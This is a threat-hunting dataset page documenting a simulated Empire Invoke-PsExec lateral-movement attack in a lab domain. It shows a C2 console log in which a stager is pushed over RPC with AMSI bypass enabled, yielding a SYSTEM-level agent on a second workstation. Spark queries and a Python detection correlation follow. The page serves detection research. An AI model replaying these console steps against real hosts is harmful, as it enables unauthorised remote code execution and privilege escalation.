Empire Invoke PsExec

Metadata

Author

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2019/05/18

Modification Date

2020/09/20

Tactics

['TA0002', 'TA0008']

Techniques

['T1021']

Tags

['RPC CreateService', 'RPC StartService', 'TCP Svcctl']

Dataset Description

This dataset represents adversaries remotely creating and starting a service via RPC methods over TCP.

Notebooks

Notebooks created by the community leveraging the mordor datasets

Author    Name    Link
------    ----    ----

Simulation Plan

Environment     Tool Type    Module
-----------     ---------    ------
Mordor shire    C2           lateral_movement

Adversary View

(Empire: stager/multi/launcher) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
A7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            
HBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            
UF5MYK42 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         6404   5/0.0    2020-09-20 16:13:06  http            


(Empire: agents) > interact UF5MYK42
(Empire: UF5MYK42) > usemodule lateral_movement/invoke_psexec
(Empire: powershell/lateral_movement/invoke_psexec) > set Listener http
(Empire: powershell/lateral_movement/invoke_psexec) > execute
(Empire: powershell/lateral_movement/invoke_psexec) > set ComputerName WORKSTATION6.theshire.local
(Empire: powershell/lateral_movement/invoke_psexec) > info

              Name: Invoke-PsExec
            Module: powershell/lateral_movement/invoke_psexec
        NeedsAdmin: False
        OpsecSafe: False
          Language: powershell
MinLanguageVersion: 2
        Background: True
  OutputExtension: None

Authors:
  @harmj0y

Description:
  Executes a stager on remote hosts using PsExec type
  functionality.

Comments:
  https://github.com/rapid7/metasploit-
  framework/blob/master/tools/psexec.rb

Options:

  Name             Required    Value                     Description
  ----             --------    -------                   -----------
  Agent            True        UF5MYK42                  Agent to run module on.                 
  Listener         False                                 Listener to use.                        
  Obfuscate        False       False                     Switch. Obfuscate the launcher          
                                                        powershell code, uses the               
                                                        ObfuscateCommand for obfuscation types. 
                                                        For powershell only.                    
  ObfuscateCommand False       Token\All\1               The Invoke-Obfuscation command to use.  
                                                        Only used if Obfuscate switch is True.  
                                                        For powershell only.                    
  AMSIBypass       False       True                      Include mattifestation's AMSI Bypass in 
                                                        the stager code.                        
  AMSIBypass2      False       False                     Include Tal Liberman's AMSI Bypass in   
                                                        the stager code.                        
  ComputerName     True        ComputerName WORKSTATION6.theshire.local Host to execute the stager on.          
  ServiceName      True        Updater                   The name of the service to create.      
  Command          False                                 Custom command to execute on remote     
                                                        hosts.                                  
  ResultFile       False                                 Name of the file to write the results to
                                                        on agent machine.                       
  UserAgent        False       default                   User-agent string to use for the staging
                                                        request (default, none, or other).      
  Proxy            False       default                   Proxy to use for request (default, none,
                                                        or other).                              
  ProxyCreds       False       default                   Proxy credentials                       
                                                        ([domain\]username:password) to use for 
                                                        request (default, none, or other).      

(Empire: powershell/lateral_movement/invoke_psexec) > execute
[>] Module is not opsec safe, run? [y/N] y
[*] Tasked UF5MYK42 to run TASK_CMD_JOB
[*] Agent UF5MYK42 tasked with task ID 1
[*] Tasked agent UF5MYK42 to run module powershell/lateral_movement/invoke_psexec
(Empire: powershell/lateral_movement/invoke_psexec) > 
Job started: RNU5DY

[*] Sending POWERSHELL stager (stage 1) to 172.18.39.6

[*] New agent 9CMNYX72 checked in
[+] Initial agent 9CMNYX72 from 172.18.39.6 now active (Slack)
[*] Sending agent (stage 2) to 9CMNYX72 at 172.18.39.6

(Empire: powershell/lateral_movement/invoke_psexec) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
A7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            
HBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            
UF5MYK42 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         6404   5/0.0    2020-09-20 16:17:06  http            

9CMNYX72 ps 172.18.39.6     WORKSTATION6      *THESHIRE\SYSTEM        powershell         4312   5/0.0    2020-09-20 16:17:08  http            

(Empire: agents) > interact 9CMNYX72
(Empire: 9CMNYX72) > shell whoami
[*] Tasked 9CMNYX72 to run TASK_SHELL
[*] Agent 9CMNYX72 tasked with task ID 1
(Empire: 9CMNYX72) > 
nt authority\system

..Command execution completed.

(Empire: 9CMNYX72) > back

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/lateral_movement/host/empire_psexec_dcerpc_tcp_svcctl.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+----------------------------------------+-------+-----+
|Hostname                   |Channel                                 |EventID|count|
+---------------------------+----------------------------------------+-------+-----+
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |1144 |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |596  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |351  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |347  |
|WORKSTATION5.theshire.local|Windows PowerShell                      |800    |255  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |13     |229  |
|WORKSTATION5.theshire.local|Microsoft-Windows-PowerShell/Operational|4103   |224  |
|WORKSTATION6               |Windows PowerShell                      |800    |169  |
|WORKSTATION6.theshire.local|Microsoft-Windows-PowerShell/Operational|4103   |126  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |122  |
|WORKSTATION6.theshire.local|security                                |4658   |111  |
|WORKSTATION6.theshire.local|security                                |4656   |58   |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |13     |58   |
|WORKSTATION6.theshire.local|security                                |4690   |56   |
|MORDORDC.theshire.local    |Security                                |5156   |39   |
|WORKSTATION6.theshire.local|security                                |4663   |38   |
|WORKSTATION6.theshire.local|security                                |5158   |36   |
|WORKSTATION6.theshire.local|security                                |4703   |30   |
|MORDORDC.theshire.local    |Security                                |5158   |28   |
|WORKSTATION5.theshire.local|Security                                |5158   |27   |
+---------------------------+----------------------------------------+-------+-----+
only showing top 20 rows
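The PsExec-style sequence this dataset captures (a network logon to the target followed seconds later by a service being created and started) can be correlated on the target host's Security log. The example below is added here and is not the Mordor project's own code: it runs over constructed records in the flat {Hostname, Channel, EventID, ...} shape the mordorTable query selects from, and the Empire module's default service name "Updater" comes from the options table above, while the timestamps, the service command line and the remaining field names are assumptions taken from the standard Windows 4624/4697 event schema.

```python
# Added example (not from the Mordor project): flag a Security 4697 (service installed)
# that follows a Security 4624 LogonType 3 (network logon) of the same account on the
# same host within a short window, the classic remote-service-creation pattern.
# SAMPLE_EVENTS is constructed for this example; hosts and IPs mirror the agents
# listing on this page, everything else (times, command line, field values) is assumed.
import json
from datetime import datetime

SAMPLE_EVENTS = r"""
{"@timestamp": "2020-09-20T16:17:00Z", "Hostname": "WORKSTATION6.theshire.local", "Channel": "security", "EventID": 4624, "LogonType": 3, "IpAddress": "172.18.39.5", "TargetUserName": "pgustavo"}
{"@timestamp": "2020-09-20T16:17:04Z", "Hostname": "WORKSTATION6.theshire.local", "Channel": "Security", "EventID": 4697, "SubjectUserName": "pgustavo", "ServiceName": "Updater", "ServiceFileName": "powershell -NoP -enc <stager>"}
{"@timestamp": "2020-09-20T16:17:05Z", "Hostname": "WORKSTATION6.theshire.local", "Channel": "Security", "EventID": 4624, "LogonType": 5, "IpAddress": "-", "TargetUserName": "SYSTEM"}
{"@timestamp": "2020-09-20T10:00:00Z", "Hostname": "WORKSTATION5.theshire.local", "Channel": "Security", "EventID": 4697, "SubjectUserName": "Administrator", "ServiceName": "Updater", "ServiceFileName": "C:\\Updater\\updater.exe"}
"""


def find_remote_service_installs(raw_lines, window_seconds=60):
    """Return one alert per 4697 preceded within window_seconds by a network logon of the same account."""
    events = [json.loads(line) for line in raw_lines.splitlines() if line.strip()]
    for e in events:
        e["ts"] = datetime.strptime(e["@timestamp"], "%Y-%m-%dT%H:%M:%SZ")
        e["Channel"] = e["Channel"].lower()  # the dataset mixes "Security" and "security"
    network_logons = [e for e in events
                      if e["Channel"] == "security" and e["EventID"] == 4624 and e["LogonType"] == 3]
    alerts = []
    for svc in (e for e in events if e["Channel"] == "security" and e["EventID"] == 4697):
        for logon in network_logons:
            gap = (svc["ts"] - logon["ts"]).total_seconds()
            if (logon["Hostname"] == svc["Hostname"]
                    and logon["TargetUserName"] == svc["SubjectUserName"]
                    and 0 <= gap <= window_seconds):
                alerts.append({"host": svc["Hostname"], "source_ip": logon["IpAddress"],
                               "account": svc["SubjectUserName"], "service": svc["ServiceName"],
                               "image": svc["ServiceFileName"], "seconds_after_logon": int(gap)})
                break  # one alert per service install
    return alerts


if __name__ == "__main__":
    for alert in find_remote_service_installs(SAMPLE_EVENTS):
        print(alert)
```

Event 4697 is only written when "Audit Security System Extension" is enabled; without it, the System log's 7045 carries the same service name and image path and can stand in for it in the join.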